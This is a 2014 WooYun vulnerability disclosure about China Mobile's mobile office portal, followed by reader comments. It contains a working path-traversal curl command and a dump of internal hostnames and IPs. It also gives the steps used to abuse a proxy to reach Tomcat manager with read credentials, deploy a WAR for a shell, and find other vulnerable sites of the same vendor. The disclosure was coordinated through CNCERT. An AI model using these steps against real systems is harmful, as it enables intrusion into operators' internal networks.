当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-085441

漏洞标题:中移动某内部核心业务文件读取及延伸(内网边界突破技巧)

相关厂商:中国移动&某系统厂商

漏洞作者: s0mun5

提交时间:2014-12-01 15:23

修复时间:2015-01-15 15:24

公开时间:2015-01-15 15:24

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-01: 细节已通知厂商并且等待厂商处理中
2014-12-05: 厂商已经确认,细节仅向厂商公开
2014-12-15: 细节向核心白帽子及相关领域专家公开
2014-12-25: 细节向普通白帽子公开
2015-01-04: 细节向实习白帽子公开
2015-01-15: 细节向公众公开

简要描述:

中移动某内部核心业务文件读取到奇葩方式getshell
最后延伸到某商业系统

详细说明:

https://moa.10086.cn
中国移动移动办公系统。

Snip20141201_6.png


存在任意文件读取

curl https://moa.10086.cn/../../../../../../../../../etc/hosts -k
127.0.0.1	tailorcmcc1	localhost.localdomain	localhost
::1	tailorcmcc1	localhost6.localdomain6	localhost6
#127.0.1.1	tailorcmcc1
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
10.1.48.57   emis.hq.cmcc
10.1.48.9    cmccbpm1.hq.cmcc
10.1.28.21   oa.hq.cmcc
10.2.7.85    efinance.hq.cmcc
10.1.48.25   cmccbpm3.hq.cmcc
10.1.48.48   iscbpm.hq.cmcc
10.1.48.167  cmccapp4.hq.cmcc
10.1.48.165  hqtydb.hq.cmcc hqtyyb.hq.cmcc
10.1.48.151  hqmail.hq.cmcc
10.1.48.170  cmccapp5.hq.cmcc
10.1.48.164  cmccsm.hq.cmcc
10.1.52.250  uum.hq.cmcc
10.1.48.166	cmccapp3.hq.cmcc
10.1.48.58	app1.hq.cmcc
10.1.48.34	cmccbpm4.hq.cmcc
10.1.48.24	cmccbpm2.hq.cmcc
10.1.48.15	newsonline.hq.cmcc
10.1.48.23	resource.hq.cmcc
#172.16.20.51 mail.chinamobile.com
172.16.121.101 mail.chinamobile.com


后来发现所有的数据都是通过一个叫tailor的二级目录代理进内网做的,猜测这是一个代理服务。

Snip20141201_7.png

漏洞证明:

然后访问https://moa.10086.cn/tailor/http://localhost:8080
访问tomcat成功,利用文件读取读到tomcat密码

Snip20141201_8.png


由于测试发现这个代理不能带401的验证头,在url中写入 访问后台成功
https://moa.10086.cn/tailor/http://admin:passwords@localhost:8080/manager/html
然后部署war包,getshell。

Snip20141201_12.png


出于好奇研究后发现tailor就是一个代理服务,并且可以转码web——》wap
然后找到了这套系统的厂商http://www.h3w.com.cn/。

Tailor是什么?
       Tailor是北京掌中经纬技术有限公司潜心数年研究开发的移动化中间件产品。该产品技术已向国家产权局申请了相关专利并已受理。
Tailor能干什么?
       Tailor顾名思义是一个裁缝,它可以根据用户要求,对各种Web应用进行裁剪、设计、缝制形成一个新的应用,并且Tailor技术是天然移动化的。
Tailor关键技术:
       1. Web应用的拆分与重装技术通过该项技术,可根据业务需要将各类Web应用在应用层完成应用拆解与重组装,并且无需原应用提供接口。
       2. JavaScript执行过程的动态控制可将Web应用前台主要业务逻辑控制脚本(JavaScript)执行过程进行动态控制,包括中断、切分、再执行等。
       通过此两项关键技术,不但可完成某单一简单或复杂应用移动化,并可进行多应用服务融合,甚至对整个服务流程进行切片、重组、优化。目前该两项技术均已申请相关专利


Snip20141201_13.png

成功案例不少,找一个测试一个问题的通用性。
https://m.scmcc.com.cn/

Snip20141201_14.png


Snip20141201_17.png


这家厂商问题还是不少的 比如
http://www.wosoo.net:8880/CQLXEPM/sysmanage/login.action

Snip20141201_18.png


ewp系统 存在struts命令执行,进入内网拿到客户列表应该能突破一些
比如没找到地址的百度~

修复方案:

版权声明:转载请注明来源 s0mun5@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-12-05 17:12

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向中国移动通报。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-12-01 15:26 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    下一个会是联通?

  2. 2014-12-01 15:29 | loli 认证白帽子 ( 普通白帽子 | Rank:550 漏洞数:52 )

    文件读取到内网漫游么

  3. 2014-12-01 15:29 | 白非白 ( 普通白帽子 | Rank:447 漏洞数:60 | ♫ Freedom - Anthony Hamilton ♫)

    系统厂商?redhat?

  4. 2014-12-01 15:34 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    叼叼叼 小V还差多少核心?

  5. 2014-12-01 15:35 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    这是要破纪录的节奏哇

  6. 2014-12-01 15:35 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  7. 2014-12-01 15:39 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    V587

  8. 2014-12-01 15:46 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    又闪电了!我为什么要说又?

  9. 2014-12-01 15:47 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @px1624 闪电什么时候这么容易了....

  10. 2014-12-01 15:49 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    @子非海绵宝宝 小V本来不就是核心么

  11. 2014-12-01 15:57 | 茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生,这几个月忙着把屎把尿...忒...)

    文件读取很常见,但是没有姿势shell,这个要学习一下

  12. 2014-12-01 16:13 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @子非海绵宝宝 能闪电肯定很牛逼,关注坐等可以看

  13. 2014-12-01 16:30 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    求获取闪电小窍门啊!~

  14. 2014-12-01 16:31 | cf_hb ( 普通白帽子 | Rank:119 漏洞数:17 | 爱生活,爱安全!)

    期待ing

  15. 2014-12-01 16:34 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @子非海绵宝宝 你上一个闪电就是敲门

  16. 2014-12-01 16:51 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    牛逼啊 只发精华漏洞

  17. 2014-12-01 16:59 | 邓先生 ( 路人 | Rank:4 漏洞数:4 | 其实,打你就像划小船)

    好期待

  18. 2014-12-01 17:26 | 狼狗 ( 路人 | 还没有发布任何漏洞 | 我来到这里是为了国家各个互联网安全。学习...)

    不错不错。好给力的技术、

  19. 2014-12-01 18:13 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    突破边界,socks?

  20. 2014-12-01 21:54 | RainShine ( 路人 | Rank:2 漏洞数:4 )

    关注

  21. 2014-12-01 22:12 | s3xy ( 核心白帽子 | Rank:832 漏洞数:113 | 相濡以沫,不如相忘于江湖)

    坐等小v核心

  22. 2014-12-01 22:39 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)

    这是一个神奇的漏洞

  23. 2014-12-02 13:08 | Cyrils ( 实习白帽子 | Rank:45 漏洞数:10 | the more the better)

    Mark

  24. 2014-12-26 09:04 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    通用?